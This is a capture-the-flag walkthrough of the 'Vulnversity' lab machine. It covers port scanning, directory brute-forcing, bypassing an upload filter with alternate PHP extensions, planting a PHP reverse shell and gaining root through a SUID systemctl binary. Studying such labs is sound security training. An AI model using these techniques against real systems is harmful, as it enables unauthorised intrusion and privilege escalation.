Vulnversity
Task 1 - Deploy the machine
🎯 Target IP: 10.10.39.96
Create a directory for machine on the Desktop and a directory containing the scans with nmap.
Task 2 - Reconnaissance
I prefer to start recon by pinging the target, this allows us to check connectivity and get OS info.
Sending these three ICMP packets, we see that the Time To Live (TTL) is ~64 secs. this indicates that the target is a *nix system (probably Linux), while Windows systems usually have a TTL of 128 secs.
2.1 - Scan the box; how many ports are open?
6 ports are open
2.2 - What version of the squid proxy is running on the machine?
Seeing last report scan, we see that squid-http is a service of tcp port 3128.
3.5.12 is the squid proxy version.
2.3 - How many ports will Nmap scan if the flag -p-400 was used?
400 ports
2.4 - What is the most likely operating system this machine is running?
Ubuntu
2.5 - What port is the web server running on?
Port 3333
2.6 - What is the flag for enabling verbose mode using Nmap?
-v
Task 3 - Locating directories using Gobuster
Using a fast directory discovery tool called Gobuster
, you will locate a directory to which you can use to upload a shell.
Gobuster is a tool used to brute-force URIs (directories and files), DNS subdomains, and virtual host names.
3.1 - What is the directory that has an upload form page?
/internal/
Task 4 - Compromise the Webserver
Now that you have found a form to upload files, we can leverage this to upload and execute our payload, which will lead to compromising the web server.
4.1 - What common file type you'd want to upload to exploit the server is blocked? Try a couple to find out.
.php
We will fuzz the upload form to identify which extensions are not blocked.
To do this, we're going to use BurpSuite.
We're going to use Intruder (used for automating customised attacks).
To begin, make a wordlist with the following extensions:
.php
.php3
.php4
.php5
.phtml
.phtml
Now that we know what extension we can use for our payload, we can progress.
We are going to use a PHP reverse shell as our payload. A reverse shell works by being called on the remote host and forcing this host to make a connection to you. So you'll listen for incoming connections, upload and execute your shell, which will beacon out to you to control!
Download the following reverse PHP shell here.
4.2 - What is the name of the user who manages the webserver?
bill
4.3 - What is the user flag?
Task 5 - Privilege Escalation
Now that you have compromised this machine, we will escalate our privileges and become the superuser (root).
In Linux, SUID (set owner userId upon execution) is a special type of file permission given to a file. SUID gives temporary permissions to a user to run the program/file with the permission of the file owner (rather than the user who runs it).
For example, the binary file to change your password has the SUID bit set on it (/usr/bin/passwd). This is because to change your password, it will need to write to the shadowers file that you do not have access to, root does, so it has root privileges to make the right changes.
5.1 - On the system, search for all SUID files. Which file stands out?
We can use the following command to list SUID files:
/bin/systemctl stands out, at it is used to control and monitor services!
5.2 - Become root and get the last flag (/root/root.txt)
We can use script of this website to became a root, in this case we choose systemctl process https://gtfobins.github.io/gtfobins/systemctl/